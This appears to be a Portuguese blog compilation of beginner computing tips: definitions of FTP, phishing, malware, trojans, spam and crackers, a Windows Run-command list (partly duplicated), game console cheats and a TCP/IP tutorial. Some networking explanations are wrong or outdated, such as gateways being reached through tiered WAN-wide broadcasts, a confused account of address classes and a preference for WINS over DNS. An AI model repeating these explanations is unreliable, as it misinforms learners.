Oque é Ftp

FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma bastante rápida e versátil de transferir arquivos (também conhecidos como ficheiros), sendo uma das mais usadas na internet.

Uma interface gráfica de um cliente FTPPode referir-se tanto ao protocolo quanto ao programa que implementa este protocolo (neste caso, tradicionalmente aparece em letras minúsculas, por influência do programa de transferência de arquivos do Unix).

A transferência de dados em redes de computadores envolve normalmente transferência de ficheiros e acesso a sistemas de ficheiros remotos (com a mesma interface usada nos ficheiros locais). O FTP (RFC 959) é baseado no TCP, mas é anterior à pilha de protocolos TCP/IP, sendo posteriormente adaptado para o TCP/IP. É o standard da pilha TCP/IP para transferir ficheiros, é um protocolo genérico independente de hardware e do sistema operativo e transfere ficheiros por livre arbítrio, tendo em conta restrições de acesso e propriedades dos ficheiros.

Modos e interfaces

O protocolo subjacente ao FTP pode correr nos modos iterativo ou batch. O cliente FTP fornece uma interface interactiva, enquanto que o MIME e o HTTP usam-no diretamente. O protocolo permite a gravação e obtenção de ficheiros, a listagem do diretório e a alteração do diretório de trabalho.

O que e Phishing

Phishing é uma forma de fraude eletrônica, caracterizada por tentativas de adquirir informações sensíveis, tais como senhas ..e números de cartão de crédito, ao se fazer passar como uma pessoa confiável ou uma empresa enviando uma comunicação eletrônica oficial, como um correio ou uma mensagem instantânea. O termo Phishing surge das cada vez mais sofisticadas artimanhas para "pescar" (do inglês fish) as informações sensíveis dos usuários. O que é Phishing?

O golpe de phishing (também conhecido como phishing scam, ou apenas scam) é realizado por uma pessoa mal-intencionada através da criação de um website falso e/ou do envio de uma mensagem eletrônica falsa, geralmente um e-mail ou recado através de scrapbooks como no sítio Orkut, entre outros exemplos. Utilizando de pretextos falsos, tenta enganar o receptor da mensagem e induzi-lo a fornecer informações sensíveis (números de cartões de crédito, senhas, dados de contas bancárias, entre outras).

O que e Malware

São spams e hoax com objetivos definidos , para obter dados de maneira fraudulenta, ou personificação de confiança para roubo de informações. Inclui nesta categoria os worms, spywares, trojans e vírus de computador.Ou seja são os virus, trojans, spans e hoax, Para ter Acesso Fraudulenta. ou Seja "Malware" é um termo geral normalmente aplicado ao nos referir-mos a qualquer software desenvolvido para causar danos em computadores, servidores ou redes de computador, e isso independentemente de o software ser um vírus, um spyware, etc.

Portanto qualquer software, por exemplo um trojan, ou mesmo um worm, etc são denominados de "malware", o que informa que esses são software que causam MAL a um equipamento, software ou arquivo de dados de um usuário.

Obviamente temos que sempre levar em conta os reais níveis de criticidade e risco a segurança causado por cada um dos grupos de malware. Com certeza um Spyware é muito menos perigoso (e seus fabricantes alegam que não levam nenhum risco!) que um vírus, trojan ou worm.

O que e Trojan

O que é trojan
Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.

Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.

A maioria dos trojans incluem também o que chamamos de backdoor.

Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.

O que e Spam

Já spam é o envio de mensagens não solicitadas, em grande número, a destinatários desconhecidos.

Com certeza você já recebeu alguma mensagem pedindo para acessar um site, juntar-se a um esquema de pirâmide ou ainda comprar um produto. Pois todas estas mensagens, e outras, se não autorizadas ou requisitadas por voce, são spam. O termo spam surgiu de um episódio da série do Monty Python onde pessoas pediam insistentemente por spam (um produto enlatado americano). Uma pessoa que envia spams, é conhecida na internet como "spammer". O termo UCE (unsolicited commercial e-mail, e-email comercial não solicitado) também é muito usado e é basicamente o mesmo que um spam. Algumas pessoas diferenciam o spam do UCE pelo caráter comercial do segundo.
As vezes é preciso um pouco de bom senso e boa memória para saber se a mensagem que você recebeu se trata de um spam, pois é comum os spammers alegarem que você mesmo assinou uma lista ou pediu informações sobre determinado serviço, o que muitas vezes é uma falsa afirmação usada para justificar o envio dos spams.

O que e Virus

Estritamente falando, vírus são códigos maliciosos capazes de infectar outros arquivos ou programas do disco rígido, assim se multiplicando. Entretanto, o termo vírus é associado popularmente com qualquer código malicioso, ou malware, incluindo cavalos de tróia, worms e até mesmo spywares e adwares.

Nesse sentido, um vírus é qualquer programa de computador feito para incomodar, assustar, roubar dados ou danificar a máquina. Vírus são programas de computador como qualquer outro que você tenha instalado na sua máquina — a diferença é que vírus são instalados sem que você dê permissão.

Existem vários tipos de vírus, são eles:

Cavalos de Tróia — também conhecidos como Trojans, são programas maliciosos que não são capazes de se espalhar por si só. Muitos programas maliciosos (como backdoors abaixo) não se espalham por si só e portanto também caem na definição de cavalo de tróia.
Backdoor — (”porta dos fundos”) permite que um computador infectado seja controlado remotamente.

O que e Cracker

ão indivíduos que mexem e alteram o funcionamento de um programa fazendo com que ele trabalhe da forma como ele quer, ou seja muitas empresas distribuem seus sofwares na forma TRIAL de 30 dias de utilização, os crackers usando de conhecimentos avançados de linguagem assembly e debuggando esses sofwares empresarias , fazem com que funcione mais de 30 dias ou acham chavés de registro vasculhando o código e registrando de forma ilegalmente o programa, muitas vezes posta seus CRACK,S na internet , seja pra jogos pra programas e etc.

Cracker, de acordo com o significado originalmente cunhado ao termo, designa sim, elementos mal intencionados, que estudam e decodificam programas e linguagens a fim de causar danos a computadores alheios. A intenção é invadir e sabotar sistemas, quase sempre objetivando a captação de dados passíveis de render cifras. Ou seja, roubo eletrônico, estelionato ou o que quer que seja. A intenção é definitivamente ruim.

Existem ainda diversas subdivisões para o termo cracker: cader, especialistas em fraudar cartões de crédito; defacer, indivíduo que desfigura as páginas principais de sites; e outros muitos, que expostos aqui só serviriam ao fomento da confusão entre os termos prioritariamente discutidos. Vale lembrar novamente a diferença entre bons e maus: hackers do bem, crackers do mau.

O que existe e acontece comumente é a confusão entre o sentido das palavras hacker e cracker, confusão esta criada pelo uso informal da língua. E, sabemos, a língua é quem faz o dicionário. Dificilmente esta situação será revertida, em vista da publicação de termos errôneos pela mídia não especializada, porém de massas. Cientes desta condição, os verdadeiros e originais hackers (lembremos, pessoas do bem, interessadas no desenvolvimento e liberação das tecnologias) arranjaram um outro termo para identificá-los: agora são geeks!

Historia da internet

#


1836: O telégrafo é patenteado por Cooke e Wheatstone, iniciando as bases da telefonia.
# 1858: Surge o primeiro cabo transatlântico, permitindo a comunicação além do oceano Atlântico.
# 1876: Alexander Grahan Bell faz a demonstração do telefone, criando o futuro cenário para a Internet.
# 1962: Inventado o dispositivo de rede que permite dividir a informação em partes pequenas antes de ser transmitida.
# 1969: Nasce a Internet.
# 1971: A invenção do e-mail.
# 1973: Especificado o protocolo de transferência de arquivos. Isso revolucionou a maneira como os dados eram transmitidos ao redor do mundo.
# 1984: Surge o Servidor de Domínio de Nomes, tornando os endereços da Web mais fáceis de lembrar.
# 1991: A implementação dos servidores de ampla área de informação criou um mecanismo de índice de arquivos na Internet. Isso permitiu uma busca rápida por meio de palavras-chave.
# 1992: Entram no ar as primeiras videoconferências pela Net.
# 1996: Começa a guerra dos Web browsers entre a Microsoft e a Netscape.
# 2000: O programa de permuta de arquivos Napster surge e gera uma massiva controvérsia. O vírus The Love Letter espalha-se descontroladamente.

Seu nome na barra do explore

1- Iniciar/Executar e digite "gpedit.msc" sem as aspas e aperte Enter,

2- Na janela que aparece, do lado esquerdo, clique em "Configuração de Usuário"

3- Depois clique em "Configuração do Windows", "Manutenção do Internet Explorer" e "Interface do usuário navegador"

4- Na coluna da direita dê um duplo clique em "Título do navegador"

5- Na janela a seguir você poderá digitar o que quiser para aparecer na barra de título, marque a opção "Personalizar Barras de Título" e escreva por exemplo o seu próprio " Nome "

Clique em OK e feche a janela Diretivas de grupo.

Pronto, agora abra o Internet Explorer e vai estar lá em cima o nome assim:

"Windows Internet Explorer fornecido por 'SEU NOME QUE VOCÊ COLOCOU LÁ'


Obs : Apenas Funciona no Windows XP

Dica para c.s

bot_sniper_only - Bots compram somente Sniper

bot_knives_only 1 - Bots usam somente faca

cl_levellocks 16382 - Libera o modo All Deleted Scenes

sv_cheats 1 - Habilita os Cheats

Fly Faz - O personagem voar

notarget - Inimigos não podem te ver

noclip - Atravessa paredes

god - Modo Deus

kick - Dá kick Bots

bot_kill - Mata todos os Bots

bot_goto_mark #number - Faz o Bot ir para determinado lugar

bot_zombie 1 - Faz os Bots ficarem parados

Comandos do executar

Accwiz.exe - Acessa o Assistente de Acessibilidade
Calc.exe - Executa o programa Calculadora
Charmap.exe - Executa o Mapa de Caracteres
ChkDsk.exe - Executa o Scandisk em ambiente simulado DOS
CleanMgr.exe - Executa a Limpeza de Disco
CliconFg.exe - Executa o utilidade Rede para clientes do SQL Server
CMD.exe - Executa o Prompt de Comando do DOS
Control.exe - Acessa o Painel de Controle
DxDiag.exe - Ferramenta de Diagnóstico do Direct X
EudCedit.exe - Executa Editor de caracteres especiais
Explorer.exe - Acessa o Windows Explorer
Magnify.exe - Executa a Lente de aumento do Windows XP
Mspaint.exe - Executa o Paint Brush
MsHearts.exe - Executa o Jogo de Copas
Mstsc.exe - Abre a janela para conexão de área de trabalho Remota
MSconfig.exe - Utilitário de configuração do Sistema
Notepad.exe - Acessa o Bloco de Notas
NetSetup.exe - Executa o Assistente para configuração de rede doméstica
Ntbackup.exe - Assistente para Backup e restauração
Osk.exe - Executa o teclado Virtual
PergMon.exe - Gerenciador de Desempenho do Windows XP
Regedit.exe - Acessa o ambiente de exploração do registro do Windows
Rstrui.exe - Executa o Assistente para restauração do Sistema
Sol.exe - Executa o Jogo Paciência
Spider.exe - Executa o Jogo Spider
Telnet.exe - Acessa o ambiente DOS possibilitando a comunicação Remota
TaskMgr.exe - Gerenciador de Tarefas do Windows
Winchat.exe - Bate Papo do Windows
Write.exe - Wordpad do Windows
Ferramentas Administrativas
gpedit.msc - Diretivas de Grupos
perfmon.msc - Serviço de componentes
compmgmt.msc - Gerenciamento do Computador
services.msc - Serviços
secpol.msc - Diretiva de Segunça Local
comexp.msc - Serviços de Componentes
odbcad32.exe - Fontes de Dados (ODBC)

Assistente de controles => access.cpl
Assistente de acessibilidade => accwiz
Adicionar novo hardware => hdwwiz.cpl
Adicionar/Remover programas => appwiz.cpl
Ferramentas Admnistrativas => control admintools
Adobe Acrobat (Executar se instalado ) => acrobat
Adobe Designer (Executar se instalado ) => acrodist
Adobe Distiller (Executar se instalado ) => acrodist
Adobe ImageReady (Executar se instalado ) => imageready

Adobe Photoshop (Executar se instalado ) => photoshop
Atualizações automáticas => wuaucpl.cpl
Assistente para transferência BlueTooth => fsquirt
Calculadora => calc
Gerenciador de Certeficados => certmgr.msc
Mapa de caracteres => charmap
Check Disk Utility => chkdsk
Visualizador da área de armazenamento => clipbrd
Janela de comandos DOS => cmd
Serviços de Componentes => dcomcnfg
Gerenciamento do computador => compmgmt.msc
Painel de Controle => control
Propriedades de data e tempo => timedate.cpl
DDE Shares => ddeshare
Gerenciamento de dispositivos => devmgmt.msc
Direct X Control Panel (Se instalado )* => directx.cpl
Direct X Troubleshooter => dxdiag
Limpeza de Disco => cleanmgr
Desfragmentador de Discos => dfrg.msc
Gerenciamento de Discos => diskmgmt.msc
Gerenciamento de partição de Discos => diskpart
Propriedades de Vídeo => control desktop
Propriedades de Vídeo => desk.cpl
Propriedades de Vídeo (aparência) => control color
Dr. Watson System Troubleshooting Utility => drwtsn32
Driver Verifier Utility => verifier
Event Viewer => eventvwr.msc
Assistente para transferência de arquivos e informações => migwiz
Verificação de assinatura de arquivo => sigverif
Busca rápida => findfast.cpl
Firefox (Executar se instalado ) => firefox
Propriedades de pasas => control folders
Fonts => control fonts
Fonts (Pasta) => fonts
Jogo FreeCell => freecell
Controle para Jogos => joy.cpl
Group Policy Editor (XP Prof) => gpedit.msc
Jogo de cartas => mshearts
Ajuda e suporte => helpctr
HyperTerminal => hypertrm
Iexpress Wizard => iexpress
Indexing Service => ciadv.msc
Internet Connection Wizard => icwconn1
Internet Explorer => iexplore
Propriedades da Internet => inetcpl.cpl
Suporte a Configurações da Internet => inetwiz
Configuração de protocolo de Internet( Visualizar tudo) => ipconfig /all
Configuração de protocolo de Internet(Visualizar DNS ) => ipconfig /displaydns
Configuração de protocolo de Internet (Deletar informações de DNS ) => ipconfig /flushdns
Configuração de protocolo de Internet (Todas as conexões ) => ipconfig /release
IP Configuration (Renovar Conexões ) => ipconfig /renew
IP Configuration (Atualizar DHCP & Re-Registers DNS) => ipconfig /registerdns
IP Configuration (Visualizar DHCP Class ID) => ipconfig /showclassid
IP Configuration (Modificar DHCP Class ID) => ipconfig /setclassid
Painel de controle Java (Executar se instalado ) => jpicpl32.cpl
Painel de controle Java (Executar se instalado ) => javaws
Propriedades do teclado => control keyboard
Configurações de segurança => secpol.msc
Usuários e Grupos locais => lusrmgr.msc
Fazer Logoff do Windows => logoff

Software para retirar Malware´s (fraco) => mrt
Microsoft Access (Executar se instalado ) => access.cpl
Microsoft Chat (Bate-papo, alguém usa isso? ) => winchat
Microsoft Excel (Executar se instalado ) => excel
Microsoft Frontpage (Executar se instalado ) => frontpg
Microsoft Movie Maker (Ferramenta para edição de filmes caseiros) => moviemk
Microsoft Paint (Famoso Paint Brushe ) => mspaint
Microsoft Powerpoint (Executar se instalado ) => powerpnt
Microsoft Word (Executar se instalado ) => winword
Ferramenta para Sincornização => mobsync
Minesweeper Game (Jogo " Mina ") => winmine
Propriedades do Mouse => control mouse
Propriedades do Mouse => main.cpl
Nero (Executar se instalado ) => nero
Netmeeting (Sofwtare para comunicação, utilizado geralmente em empresas de pequeno porte ) => conf
Conexões de rede => control netconnections
Conexões de rede => ncpa.cpl
Setupe de Conexões de rede => netsetup.cpl
Bloco de notas => notepad
Nview Desktop Manager (Executar se instalado ) => nvtuicpl.cpl
Gerenciador de Objetos => packager
Administrador de fontes de dados ODBC => odbccp32.cpl
Teclado virtual => osk
Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl
Outlook Express => msimn
Paint => pbrush
Propriedades de senha => password.cpl
Ajustar Monitor => perfmon.msc
Ajustar Monitor => perfmon
Opções de telefone e modem => telephon.cpl
Discador => dialer
Pinball Game => pinball
Propriedades de opções de energia => powercfg.cpl
Impressoras e Faxes => control printers
Pasta de impressoras => printers
Editor de characteres particulares (algúem conhece isso?) => eudcedit
Quicktime (Se instalado ) => QuickTime.cpl
Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer
Real Player (Se instalado Executar o Real player ) => realplay
Configurações regionais => intl.cpl
Editor de Registros => regedit
Editor de Registros => regedit32
Catalogo Telefonico => rasphone
Conectar a Desktop Remoto através de um Host ou IP => mstsc
Armazenamento removível => ntmsmgr.msc
Solicitação do operador de armazenamento removível => ntmsoprq.msc
Consulta de diretivas resultantes => rsop.msc
Assistente de Cameras e Scanners => sticpl.cpl
Tarefas Agendadas => control schedtasks
Centro de segurança do Windows => wscui.cpl
Serviços => services.msc
Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl
Outlook Express => msimn
Paint => pbrush
Propriedades de senha => password.cpl
Ajustar Monitor => perfmon.msc
Ajustar Monitor => perfmon
Opções de telefone e modem => telephon.cpl
Discador => dialer
Pinball Game => pinball
Propriedades de opções de energia => powercfg.cpl
Impressoras e Faxes => control printers
Pasta de impressoras => printers
Editor de characteres particulares (algúem conhece isso?) => eudcedit
Quicktime (Se instalado ) => QuickTime.cpl
Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer
Real Player (Se instalado Executar o Real player ) => realplay
Configurações regionais => intl.cpl
Editor de Registros => regedit
Editor de Registros => regedit32
Catalogo Telefonico => rasphone
Conectar a Desktop Remoto através de um Host ou IP => mstsc
Armazenamento removível => ntmsmgr.msc
Solicitação do operador de armazenamento removível => ntmsoprq.msc
Consulta de diretivas resultantes => rsop.msc
Assistente de Cameras e Scanners => sticpl.cpl
Tarefas Agendadas => control schedtasks
Centro de segurança do Windows => wscui.cpl
Serviços => services.msc

TCP/IP

TCP/IP (Transmission Control Protocol/Internet Protocol, ou Protocolo de Controle de Transmissão / Protocolo da Internet) se refere ao conjunto de protocolos utilizados na Internet. Ele inclui uma série de padrões que especificam como os computadores vão se comunicar e cria convenções para interconectar redes e para o routeamento através dessas conexões.

Os protocolos da Internet (IP) são o resultado de um projeto da DARPA (Defense Advanced Research Projects Agency, ou Agência de Projetos de Pesquisa Avançada de Defesa) sobre conectividade entre redes no final dos anos 70. Ele foi utilizado em todas as redes de longa distância do sistema de Defesa dos EUA em 1983, mas não foi amplamente aceito até ser incorporado ao BSD (Berkeley Software Distribution) Unix 4.2. A populariedade do TCP/IP é baseada em:

· Estrutura cliente-servidor robusta. O TCP/IP é uma excelente plataforma cliente-servidor, especialmente em ambientes WAN (wide-area network, ou redes de grande alcance).

· Compartilhamento de informações. Milhares de organizações miltiares, educacionais, científicas e comerciais compartilham dados, correio eletrônico (e-mail), e outros serviços na Internet usando o TCP/IP.

· Ampla disponibilidade. Implementações do TCP/IP estão disponívies em praticamente todos os sistemas operacionais populares. Seu código fonte é amplamente disponível em várias implementações. Fabricantes de bridges, routers e analizadores de redes oferecem suporte para o TCP/IP em seus produtos.



Conceitos Basicos

Existem alguns conceitos básicos que são imprencindíveis ao entendimento do TCP/IP e de redes que o utilizam.

Número de IP

Existem algumas analogias entre computadores e telefones e o número de IP é uma delas. Você pode imaginar o número IP como um número de telefone com todos os códigos de discagem internacional. Isto significa que qualquer máquina pode contactar outra máquina usando o número de IP, bastando apenas que exista um caminho entre as 2 máquinas. Além disso toda máquina na rede tem de ter um nº de IP.

Isto também significa que 2 máquinas na mesma rede NÃO podem ter o mesmo número de IP. Essa restrição só ocorre para máquinas na mesma rede, pois máquinas numa rede não conectada usualmente tem número de IP iguais, por algumas razões técnicas. No caso da analogia com os telefones, imagine 2 pessoas morando em países diferentes que possuam o mesmo número de telefone (apenas os números locais). Nesse caso não há conflito (exceto talvez na sua mente! :-) ).

O número de IP tem 4 bytes de tamanho e tem um formato específico, xxx.xxx.xxx.xxx (exemplo : 200.241.216.20). Isso significa que cada grupamento xxx só pode ir de 0 à 255 (pois essa é a capacidade de 1 byte).

Mascara de Sub-Rede

Existem 3 classes de endereços IP : classes A, B, C. A diferença entre as classes é a forma de como o nº de IP é interpretado. O nº de IP é divido em duas partes : o endereço da rede e o enderço da sub-rede. Considere o nº IP da seguinte forma : w.x.y.z (ex: 200.241.216.20)

ClasseNº de IPIndicador da redeIndicador da Sub-redeNº de redes disponíveisNº de sub-redes disponíveis A1.126wx.y.z12616,777,214 B128.191w.xy.z16,38465,534 C192.223w.x.yz2,097,151254 Obs: O endereço 192.168 é reservado para uso em redes internas, o endereço 127 é utilizado para testes de loopback e os acima de 224 (inclusive) são reservados para protocolos especiais.

Uma sub-rede é uma rede ligada diretamente a Internet através de uma rede pertencente a Internet. A rede pertencente recebe um nº de IP, e distribui nº de IP dentro de sua sub-rede. As classes apenas definem quantas sub-redes um nº de IP tem. De acordo com a tabela, existem 126 nº de IP da classe A e cada um deles pode ter 16.777.214 sub-redes. Você logo pode imaginar que não existem endereços classe A para todo mundo, e tem razão, atualmente não existem endereços classe A e B disponíveis na Internet, e os de classe C estão acabando, o IETF (Internet Engenniering Task Force, ou Força Tarefa de Engenharia da Internet ) está estudando a expansão desses números.

As máscaras de sub-rede identificam a classe do nº de IP. A primeira vista isso parece desnecessário, pois basta olhar o primeiro número do nº do IP para determinar sua classe. Mas acontece que um nº de IP classe A pode funcionar como um classe B ou classe C, dependendo da estrutura interna de sua sub-rede. Um exemplo : Imagine uma empresa com 200 filiais no Brasil conectadas por uma rede própria. A matriz tem um nº de IP classe A, digamos 100 e distribui suas sub-redes da seguinte forma :

100.1.0.0Matriz 100.2.0.0Filial 1 100.3.0.0Filial 2 ....... 100.201.0.0Filial 200 Para as filiais, o nº de IP (ex: 100.201.0.0) é de classe B, pois só tem 16.384 sub-redes disponíveis, embora comece com 100. Dentro das filiais ainda é possível se distribuir sub-redes, as quais teriam nº de IP classe C.

Para que o roteamento funcione corretamente, os computadores precisam saber qual a classe do nº de IP, e elas são as seguintes:

ClasseMáscara de Sub-rede A255.0.0.0 B255.255.0.0 C255.255.255.0

Gateway Padrão (Default Gateway)

O gateway padrão é a máquina para quem pedimos ajuda quando não conseguimos achar uma outra máquina na rede. Funciona assim: Quando uma máquina na rede precisa se comunicar com uma outra, ela emite um pedido de conexão (esse pedido é feito através de broadcasting, ou seja, a máquina envia um pedido a toda a rede, e apenas a máquina destino responde) e aguarda uma resposta. Se a resposta não vier, ela entra em contato com o gateway padrão e solicita que o mesmo conecte com a máquina destino. Se o gateway conseguir se conectar à máquina destino, ele fica como "intermediador" dessa conexão, caso contrário ele avisa a máquina solicitante que não foi possível encontrar a máquina destino.

Essa estrutura de procura visa diminuir o tráfego desnecessário na rede. Imagine só se toda a solicitação de conexão realizada na Internet (e em todas as redes conectadas à Intenet) fosse enviada para todos os computadores ligados à ela! Seria um tráfego muito grande. Ao invés disso, o broadcasting é feito em níveis, primeiro na LAN (local area network, ou rede local), depois na WAN de sua cidade ou estado, depois na WAN nacional até chegar na WAN internacional. Reduz-se desse modo todo o tráfego interno às WANs e LANs, aliviando as linhas de conexão.

DNS

Essas 3 letras não significam muita coisa para a maior parte das pessoas, mas elas significam Domain Name System (ou Sistema de Nomes de Domínio). Essas 3 palavras também não significam muita coisa para a maior parte das pessoas também, por isso vamos à analogia com o telefone. Quando deseja telefonar para a loja da esquina, você consulta o catálogo, descobre o telefone de lá e liga. Você não consegue telefonar para lugar algum se não souber o número do telefone. Na rede TCP/IP acontece a mesma coisa. Os usuários não decoram o número IP das máquinas, e sim seus nomes. Mas para se alcançar uma máquina na rede, precisamos do seu número de IP. Para resolver isso, foi criado o DNS, um serviço diponível na rede que, dado um nome de máquina, ele retorna o número de IP da mesma.

Existe uma particularidade aqui. No caso da rede local estar conectada a alguma outra, é recomendável que o servidor DNS (o programa que oferece o serviço DNS) seja executado na máquina de ligação entre as 2 redes (o gateway), para que no caso do nome requisitado não existir na rede local, o DNS possa pedir ao servidor DNS da outra rede para pesquisar tal nome.

O Windows NT oferece um serviço semelhante, o WINS (Windows Internet Name System, ou Sistema de nomes da Internet do Windows). A principal diferença entre os dois é que o DNS usa uma tabela estática, e o WINS usa uma tabela dinâmica. No caso do servidor DNS rodar numa máquina Windows NT é recomendável que ele seja substituído pelo WINS.

DHCP

Mais um caso de 4 letras que não significam nada para a maioria das pessoas. Mas infelizmente não existe uma boa analogia para o DHCP, portanto vamos direto ao assunto: DHCP significa Dynamic Host Configuration Protocol ou seja : Protocolo de Configuração de Host Dinâmico. Numa rede TCP/IP, todo computador tem de ter um número de IP distinto. Isto significa que antes de colocar uma nova máquina na rede, o administrador teria de checar quais números estão sendo utilizados para poder escolher um nº adequado para a nova máquina. Em pequenas redes isso é possível de ser feito, mas em grandes redes isso se torna uma tarefa muito tediosa e sujeita a falhas. Para evitar isso, foi criado o DHCP. Quando uma máquina entra na rede, ela procura o servidor DHCP (cujo nº de IP foi previamente fornecido) e solicita um nº de IP para si própria. O servidor verifica qual o nº disponível, informa ao solicitante esse nº e o torna indisponível para futuras solicitações. Dessa maneira, a administração dos nº de IP é feita automaticamente e não existem problemas de conflito. Quando a máquina solicitante sai da rede, o servidor DHCP torna seu nº de IP disponível novamente.

Portas

Uma porta pode ser vista como um canal de comunicações para uma máquina. Pacotes de informações chegando a uma máquina não são apenas endereçadas à maquina, e sim à máquina numa determinada porta. Você pode imaginar uma porta como sendo um canal de rádio, com a diferença fundamental de que um computador pode "ouvir" a todos os 65000 canais possíveis ao mesmo tempo!

Entretanto, um computador geralmente não está escutando a todas as portas, ele escuta umas poucas portas específicas. E ele não vai responder a um pedido que chegue numa porta a qual ele não esteja escutando.

Existem uma série de portas pré-definidas para certos serviços que são aceitos universalmente. As principais são :

ServiçoPortaDescrição FTP21File Transfer Protocol (Protocolo de Transferência de Arquivos) Telnet23Para se conectar remotamente a um servidor SMTP25Para enviar um e-mail Gopher70Browser baseado em modo texto HTTP80Protocolo WWW - Netscape, Mosaic POP3110Para receber e-mail NNTP119Newsgroups IRC6667Internet Relay Chat - Bate papo on-line Compuserve4144Compuserve WinCIM AOL5190America Online MSN569Microsoft Network Outros Termos

· Roteador : É um computador especial que é utilizado para conectar 2 ou mais redes distintas. Ele tem esse nome porque tem de "rotear" (ou redirecionar) os pacotes de uma rede para outra, atuando como um "guarda de trânsito" para os pacotes entre as redes.

· Gateway : O gateway é um computador que também é utilizado para conectar 2 ou mais redes distintas. A principal diferença para o roteador é que o gateway não tem hardware especial para efetuar o roteamento. Usualmente os gateways conectam LANs e os roteadores, WANs. Em vários casos se utiliza um roteador em conjunto com um gateway.

Visão Geral de uma rede TCP IP

Uma rede utilizando o TCP/IP tem uma estrutura básica composta por um (ou mais) servidor rodando um servidor DNS (ou WINS), DHCP, SMTP, POP3 e os servidores dos serviços desejados (HTTP, Gopher, Telnet e etc) e as máquinas clientes solicitando esses serviços. Para se interligar essa rede a uma outra rede TCP/IP, se faz necessário o uso de um roteador ou gateway e da correta configuração da rede.
Existem 2 maneiras de se ligar a LAN à Internet :

· Atribuindo-se um nº de IP válido para cada máquina na rede, o que pode ser impossível para redes com muitas máquinas.

· Atribuindo-se um nº de IP válido para o gateway e utilizando-se o nº de IP 192.168.x.x internamente.

Como o segundo caso é o mais factível, vamos observá-lo melhor. Nele, se utiliza internamente à LAN o IP 192.168.x.x, que quando da determinação do padrão dos nº de IP foi reservado para uso em redes internas, ou seja, nenhuma máquina ligada diretamente à Internet tem um IP 192.168.x.x. Isso é necessário pois como já vimos nenhuma máquina pode ter um nº de IP que já esteja sendo utilizado por uma outra máquina.

O gateway tem 2 interfaces de rede, uma para se conectar à Internet e outra para se conectar à LAN. À interface da Internet é atribuido o nº de IP válido na Internet e na da LAN o nº de IP do tipo 192.168.x.x (usualmente 192.168.0.1). Nas máquinas da LAN o nº de IP é do tipo 192.168.x.x (aonde o 1º "x" é o mesmo do do gateway) e o gateway default é o IP do gateway voltado para a LAN (192.168.x.x). Dessa forma podemos ter até 16.384 máquinas na internet por nº de IP válido. Essa estrutura também facilita a adoção de medidas de segurança contra intrusos da Internet, pois como todo o tráfego Internet passa pelo gateway, basta protegê-lo para proteger toda a LAN.

Protocolos

TCP e IP

O TCP e o IP são apenas 2 membros da família TCP/IP. IP é um protocolo que providência a entrega de pacotes para todos os outros protocolos da família TCP/IP. O IP oferece um sistema de entrega de dados sem conexão. Isto é, os pacotes IP não são garantidos de chegarem ao seu destino, nem de serem recebidos na ordem em que foram enviados. O checksum do IP confirma apenas a integridade do cabeçalho do pacote. Desta maneira, a responsabilidade pelos dados contidos no pacote do IP (e sua sequência) é tarefa de protocolos de mais alto-nível.

Talvez o protocolo de alto nível do IP mais comum seja o TCP. O TCP oferece um confiável protocolo baseado em conexão encapsulado no IP. O TCP garante a entrega dos pacotes, assegura o sequenciamento dos pacotes, e providencia um checksum que valida tanto o cabeçalho quanto os dados do pacote. No caso da rede perder ou corromper um pacote TCP/IP durante a transmissão, é tarefa do TCP retransmitir o pacote faltoso ou incorreto. Essa confiabilidade torna o TCP/IP o protocolo escolhido para transmissões baseadas em sessão, aplicativos cliente-servidor e serviços críticos como correio eletrônico.

Porém essa confiabilidade tem um preço. Os cabeçalhos dos pacotes TCP requerem o uso de bits adicionais para assegurar o correto sequenciamento da informação, bem como um checksum obrigatório para garantir a integridade do cabeçalho e dos dados. Para garantir a entrega dos pacotes, o protocolo também requer que o destinatário informe o recebimento do pacote.

Tal "informação de recebimento" (ou ACKs, de acknowledgments) geram tráfego adicional na rede, diminuindo a taxa de transferência de dados em favor da confiabilidade. Para reduzir o impacto na peformance, a maioria dos servidores enviam um ACK para todo segmento de dados (ao invés de todo pacote) ou quando um ACK expira.

UDP

Se a confiabilidade não é essencial, o UDP (User Datagram Protocol), um complemento do TCP, oferece um serviço de transmissão de dados sem conexão que não garante nem a entrega nem a correta sequência dos pacotes enviados (bem parecido com o IP). Checksums no UDP são opcionais, ofereccndo assim uma maneira de se trocar dados em uma rede altamente confiável sem consumir desnecessariamente recursos da rede.

ARP e ICMP

Dois outros protocolos na família TCP/IP tem importantes funções, embora essas funções não estejam diretamente relacionadas com a transmissão de dados: ARP (Address Resolution Protocol, ou Protocolo de Resolução de endereços) e ICMP (Internet Control Message Protocol, ou Protocolo de Controle de Mensagens da Internet). O ARP e o ICMP são protocolos de manutenção que mantêm a estrutura do IP e usualmente são invisíveis aos usuários e às aplicações.

Os cabeçalhos do IP contém tanto o endereço IP da origem quanto do destino, mas o endereço do hardware também tem de ser conhecido. O IP obtém um endereço de hardware de um determinado sistema difundindo pela rede um pacote especial de requisição (um pacote ARP de requisição) contendo o endereço IP do sistema com o qual está tentando se comunicar. Todos os nós da rede local que tiverem o ARP habilitado detectam essa difusão, e o sistema que tem o número de IP em questão envia um pacote (do tipo ARP reply, ou resposta ARP) contendo seu endereço de hardware para o computador que o solicitou. O endereço de hardware e o endereço IP do computador estão é armazenado no cache do ARP para uso futuro. Como a resposta ARP também é feita na forma de difusão, é normal que outros nós usem essa informação para atualizar seus caches ARP.

O ICMP permite que 2 nós em uma rede IP compartilhem o status do IP (protocolo) e informação de erros. Esta informação pode ser usada por protocolos de alto nível para tratar problemas de transmissão ou para administradores de rede para detectar problemas na rede. Embora estejam encapsulados em pacotes IP, o ICMP não é considerado um protocolo de alto nível (ele é necessário em toda implementação do TCP/IP). O utilitário ping faz uso do ICMP para determinar se um certo endereço IP na rede está operacional. Isto é útil para diagnosticar problemas em redes IP ou falhas em gateways.

Outros Protocolos
Além desses protocolos citados, existem os protocolos de alto-nível, como o Telnet, FTP, HTTP e etc. Vamos a uma breve descrição deles :

